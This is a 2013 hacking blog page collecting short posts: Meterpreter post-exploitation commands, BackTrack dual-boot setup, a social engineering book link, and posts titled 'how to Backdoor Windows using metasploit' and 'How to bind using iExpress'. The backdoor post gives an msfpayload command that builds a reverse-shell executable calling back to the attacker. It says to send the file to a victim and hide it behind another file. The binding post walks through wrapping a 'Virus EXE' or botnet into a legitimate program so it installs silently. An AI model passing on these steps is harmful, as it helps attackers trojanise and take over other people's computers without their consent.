Monday, March 11, 2013

How to open blocked websites in 1 step


1. This method is useful when you’re behind firewall:
Type
ping <url>
Now you can try to copy the IP Address and then open it
2. This method is used when the url is BLOCKED:
Just type “httpS” instead of “http:” of “www”.

meterpreter Commands


Here is a list with some Meterpreter commands that can be used for post exploitation.
 
- screengrab
 Screenshot from victims computer
 
- run scriptname
 Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory
 
 - sysinfo
 Show the system information on the remote target
 
 - ls
 List the files and folders on the target
 
 - use priv
 Load the privilege extension for extended Meterpreter libraries
 
 - use incognito
 Load incognito functions. (Used for token stealing and impersonation on a target machine)
 

Dual Boot: BackTrack and Windows


This method of installation is the simplest way. I have made it in the assumption that you have a Windows installation that is taking up all the space on your disk drive and you would like to resize and repartition the disk drive in order to allow a BackTrack install alongside your Windows.

DONT FORGET TO BACK-UP YOUR WINDOWS INSTALLATION FIRST!

Burn it to a DVD or a flash drive, then place the DVD in your computer’s and reboot. The system will boot into a console and you will see a prompt choose 1st option. To boot into a Live KDE desktop, type startx and press the Enter key on your keyboard.

1. Once in the Live desktop, click on the Install BackTrack icon on the desktop.

Social Engineering


Kevin Mitnick was one of the most famous social engineers in the world—popularized the term “social engineering.”
Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.
“Albert Einstein once said, “Information is not knowledge.” That is a
powerful thought. Just reading this book will not somehow implant this
knowledge into your being. Apply the principles, practice what is taught in
these pages, and make the information a part of your daily life. When you do
that is when you will see this knowledge take effect.”
                                                                                                        Christopher Hadnagy
The first book to reveal and dissect the technical aspect of many social engineering maneuvers: Download here.

Linux Essentials Manual


The new LPI Linux Essentials exam was launched at LinuxTag this week and Linup Front released their e-book on Linux Essentials at the same time under a creative commons license.

The Linux Essentials defines the basic knowledge required to competently use a desktop or mobile device using a Linux Operating System.

The Linux Essentials certificate is slated to define the basic knowledge necessary to use a Linux computer productively, and through a corresponding education programme aid young people and adults new to the open source community in understanding Linux and open-source software in the context of the ITC industry.

Linux Essentials is a new certification by the Linux Professional Institute (LPI).

Commands, compressing files, networking, programming language and much more. Download here.

how to Backdoor Windows using metasploit




Follow these 4 simple steps and have fun.


1. Open a terminal and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=(YOUR IP) LPORT=(CHOOSE A PORT) x > /root/Desktop/CHOOSE_A_FILE_NAME.exe
Now that our exploit is done:
2. Go to Metasploit console by typing msfconsole and type:
3. Now send the file to victim and as soon as they download and open it, there’s meterpreter shell on victim computer.
Thats it!
 
**It is important to hide the exploit behind other file.
Click here to see how to bind a file.

How to bind using iExpress


In Windows:
1. Go to “Start” and hit “Run”.
2. Then type in “iexpress” and hit “Ok”.
3. Make sure the check box is on “Create new Self Extraction Directive file”, then hit “Next”.
4. Click on the checkbox “Extract files and run an instalation command”, then hit “Next”.
5. Then choose a name or just hit the space bar once, to make a space in the textbox, then hit “Next”.
6. Then make sure the checkbox is on “No Prompt”, then hit “Next”.
7. Then make the checkbox on “Do not display a license”, then hit “Next”.
8. Then hit “Add” on the iexpress box, and then a window should pop up, just browse your computer and find your Virus EXE, then hit “Open”.
9. Once your done with that, it should take you back to the iexpress window, then hit “Add” again. Browse your computer again but this time for your Program your wanting it to run after your botnet. Then hit “Open”.
10. Then after your done adding the botnet/virus and the program to the bind list, hit “Next”.
11. Now on the first drop down box (Install Program) put your Virus there.
12. Now select your program you want to run after the bot in the next drop down box. (Post Install Command). Then hit “Next”.
13. Now next select the checkbox “Hidden”, and hit “Next”.
14. Then select “No Message”, then hit “Next”.
15. Now select “Browse” and find where you want to save your new binded exe at, and then type a name for it and hit “Save”.
16. Now select the checkbox “Hide File Extracting Progress Animation from User”, then hit “Next”.
17. Then hit the checkbox “No restart”, and hit “Next”.
18. Then click “Dont Save” and hit “Next”.
19. Then hit the “Finish” button…
Enjoy your new binded exe.